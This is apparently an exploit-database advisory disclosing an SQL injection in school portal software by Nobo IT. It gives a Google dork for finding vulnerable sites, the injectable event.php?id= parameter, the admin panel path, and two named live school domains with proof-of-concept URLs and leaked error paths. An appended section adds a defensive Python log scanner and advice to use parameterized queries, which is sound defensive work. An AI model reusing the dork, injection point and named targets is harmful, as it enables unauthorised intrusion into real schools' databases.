
Powered By Nobo IT Software Company Bangladesh Education Portals SQL Injection Vulnerability

Author: KingSkrupellos, Published: 11-10-2018
# Exploit Title : Powered By Nobo IT Software Company Bangladesh Education Portals SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : noboit.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090024
# Cyberizm : cyberizm.org/cyberizm-powered-by-nobo-it-software-company-bd-sql-injection.html

#################################################################################################

# Google Dork : intext:''Powered by : Nobo IT.'' site:edu.bd

# Exploit : /PATH/event.php?id=[SQL Injection]

# Admin Control Panel Path => /school_admin/

#################################################################################################

# Example Vulnerable Sites =>

suc.edu.bd/old/event.php?id=14%27 => [ Proof of Concept ] => archive.is/9N6hJ

mohanpurphs.edu.bd/old/event.php?id=7%27


# SQL Database Error =>

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/mohanpurphsedu/public_html/old/event.php on line 10

Warning: mysql_fetch_array() expects parameter 1 to be resource,
boolean given in /home/sucedu/public_html/old/event.php on line 32

A Database Error Occurred
Error Number: 1

Can't create/write to file '/tmp/#sql_c3e_0.MYI' (Errcode: 122 - Internal (unspecified) error in handler)

SHOW COLUMNS FROM `admin`

Filename: /home/dzkdcedu/public_html/core/MY_Model.php

Line Number: 40
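
The entry point above is event.php?id=, and the mysql_fetch_array() warnings show the query failing once id carries a quote. As an added example (not part of the original advisory), the Python code below applies an integer allow-list to id, the same check the server should enforce before building the query, and uses it to flag non-numeric id values in web access logs. The combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); addresses are
# documentation-range placeholders, not taken from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [11/Oct/2018:10:01:02 +0600] "GET /old/event.php?id=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Oct/2018:10:01:07 +0600] "GET /old/event.php?id=14%27 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Oct/2018:10:01:09 +0600] "GET /old/event.php?id=7&id=x HTTP/1.1" 200 830 "-" "Mozilla/5.0"
203.0.113.7 - - [11/Oct/2018:10:02:00 +0600] "GET /old/news.php?id=3%27 HTTP/1.1" 404 210 "-" "Mozilla/5.0"
203.0.113.8 - - [11/Oct/2018:10:03:00 +0600] "GET /old/event.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# client address, request target and status code from one combined-format line
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) '
)
# ASCII digits only, bounded length: anything else is not a legitimate event id
EVENT_ID_RE = re.compile(r"[0-9]{1,9}")


def is_valid_event_id(value):
    """Allow-list check for the id parameter (hypothetical helper)."""
    return EVENT_ID_RE.fullmatch(value) is not None


def suspicious_event_requests(log_text):
    """Return (client, path, bad_ids, status) for event.php hits with a non-numeric id."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.endswith("/event.php"):
            continue
        # parse_qs percent-decodes values and keeps every repeated id parameter
        ids = parse_qs(url.query, keep_blank_values=True).get("id", [])
        bad = [value for value in ids if not is_valid_event_id(value)]
        if bad:
            findings.append((client, url.path, bad, int(status)))
    return findings


if __name__ == "__main__":
    for finding in suspicious_event_requests(SAMPLE_LOG):
        print(finding)
```

Server-side, the same allow-list belongs in front of a parameterized query, with PHP error display turned off so file paths like the ones above are not returned to the client.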

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################
